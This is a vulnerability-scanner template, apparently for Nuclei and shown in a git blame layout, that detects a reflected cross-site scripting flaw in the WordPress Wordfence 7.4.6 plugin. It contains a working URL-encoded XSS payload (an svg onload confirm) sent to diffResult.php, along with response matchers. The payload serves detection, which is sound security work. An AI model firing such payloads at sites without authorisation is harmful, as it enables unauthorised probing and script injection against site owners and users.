2020-04-08 16:49:00 +00:00
|
|
|
id: wordpress-wordfence-xss
|
2020-04-08 12:06:42 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Wordfence 7.4.6 Cross Site Scripting
|
|
|
|
author: madrobot
|
2020-05-24 22:19:21 +00:00
|
|
|
severity: medium
|
2021-02-16 17:02:57 +00:00
|
|
|
tags: wordpress,wp-plugin,xss
|
2020-04-08 12:06:42 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-05-10 18:59:01 +00:00
|
|
|
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
|
|
|
|
|
2020-12-13 19:24:23 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 12:06:42 +00:00
|
|
|
matchers:
|
2020-04-08 13:27:59 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-05-10 18:59:01 +00:00
|
|
|
- "'>\"<svg/onload=confirm('test')>"
|
2020-12-13 19:24:23 +00:00
|
|
|
part: body
|
2021-06-21 12:39:16 +00:00
|
|
|
|
2020-12-13 19:24:23 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
2021-05-10 18:59:01 +00:00
|
|
|
part: header
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|